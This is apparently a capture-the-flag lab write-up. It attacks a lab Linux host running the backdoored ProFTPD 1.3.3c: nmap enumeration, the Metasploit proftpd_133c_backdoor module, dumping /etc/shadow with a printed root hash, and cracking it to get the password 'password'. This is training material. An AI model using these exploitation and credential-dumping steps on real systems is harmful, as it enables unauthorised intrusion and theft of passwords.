🔬Hashes Dumping

Lab 1

🔬 Password Cracker: Linux

  • Target IP: 192.75.64.3

  • Password Hashes dumping - /etc/shadow

Enumeration

ip -br -c a
	192.75.64.2/24
nmap -sV 192.75.64.3
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
MAC Address: 02:42:C0:4B:40:03 (Unknown)
Service Info: OS: Unix
searchsploit ProFTPD 1.3.3
searchsploit ProFTPD 1.3.3

Exploitation

Metasploit proftpd_133c_backdoor
  • Upgrade the sessions to a meterpreter session

Hashes Dumping

cat /etc/shadow

📌 root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.

  • Gather Linux Password hashes with Metasploit

  • The unshadowed password file is a file containing the format hashed password, ready to be cracked.

Crack the Hash

Metasploit crack_linux
Reveal Flag - "root" password is: 🚩

password

Last updated

Was this helpful?